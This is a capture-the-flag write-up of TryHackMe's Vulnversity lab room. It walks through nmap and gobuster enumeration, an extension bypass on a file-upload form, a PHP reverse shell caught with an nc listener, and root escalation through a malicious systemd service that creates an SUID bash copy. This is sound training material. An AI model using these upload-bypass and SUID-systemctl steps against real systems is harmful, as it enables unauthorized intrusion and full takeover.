šŸ›”ļø Vulnversity ā€“ TryHackMe CTF Walkthrough

This write-up covers my walkthrough of the Vulnversity CTF room on TryHackMe, aimed at building foundational skills in web exploitation. Although this CTF is beginner-friendly, it provides an excellent foundation for those new to web exploitation. It walks you through the basics using essential tools and offers an enjoyable, hands-on experience that can be completed in about an hour.

āš ļø Disclaimer: SPOILER ALERT!

1ļøāƒ£ Nmap ā€“ Initial Enumeration

Nmap scan results

Once you've deployed the target machine, you're ready to begin. Naturally, the first step is running an Nmap scan. While many CTF rooms tend to skip over this part or assume you already know it, I really appreciated that this one actually emphasizes it. As we all know, Nmap is absolutely vital for reconnaissanceā€”and this room makes that clear from the start.

nmap -sC -sV -p- 10.10.X.X -oN nmap_tcp_full.txt

2ļøāƒ£ Gobuster ā€“ Web Content Discovery

Gobuster results

The next step is directory enumeration using Gobuster. Since this is a web exploitation room, we obviously need a directory we can actually exploit.šŸ˜† We take the IP address of the target machine and combine it with the web server port we discovered during the Nmap scan to launch a brute-force attack on potential directories. PS: The CTF uses Gobuster in the walkthrough, but tools like Dirb or ffuf would also get the job doneā€”pick your weapon of choice.

gobuster dir -u http://10.10.X.X:3333 -w /usr/share/wordlists/dirb/common.txt -o gobuster.txt

3ļøāƒ£ BurpSuite ā€“ Fileā€‘Upload Bypass

BurpSuite Intruder fuzz

Now that weā€™ve identified the target directory, itā€™s time to bring everything together and navigate to the address. Once loaded, weā€™re greeted with a file upload pageā€”and thatā€™s where things start to get interesting. Using Burp Suite, we perform a brute-force attack to enumerate which file extensions are allowed. Pro tip: If youā€™re not familiar with Burp, you might want to pause and get comfortable with it firstā€”this room assumes you already know how to use it.

4ļøāƒ£ Reverse Shell ā€“ wwwā€‘data Access

Reverse shell screenshot

With the allowed extensions now discovered, the next step is gaining access via a reverse shell. This is where things start to get a bit more advanced. Think of the web server as a castleā€”and the upload directory we found earlier as its front gate. But this gate has guards: it doesnā€™t let just any file through. To get past them, our file needs to be in a format they recognizeā€”in this case, .phtml. We took PentestMonkeyā€™s PHP reverse shell, modified it by inserting our USERNAME0 IP address, and uploaded it as php-reverse-shell.phtml. Once we triggered the file, we successfully received a shell as www-data.

# listener
nc -lvnp 4444

# reverse shell URL (trigger)
http://10.10.X.X:3333/internal/uploads/php-reverse-shell.phtml

5ļøāƒ£ Privilege Escalation ā€“ Root via SUID systemctl

Privilege escalation screenshot

And nowā€¦ the finale. Weā€™ve snuck into the castleā€”but thereā€™s a catch. The identity we assumed is that of a lowly peasant. Our mission? Take the throne. Become root. Here's how we pulled it off: A SUID bit set on /bin/systemctl gave us the ability to create and launch our own malicious service as root. Using that, we dropped a root-owned SUID bash binary into /tmp:

# Create malicious service
cat <<'EOF' > /tmp/rootme.service
[Service]
Type=oneshot
ExecStart=/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash"
[Install]
WantedBy=multi-user.target
EOF

/bin/systemctl link /tmp/rootme.service
/bin/systemctl enable rootme.service
/bin/systemctl start rootme.service

# Pop root shell
/tmp/rootbash -p

And just like that ā€” root access achieved. A quick cat /root/root.txt and the final flag was ours. šŸ

My Site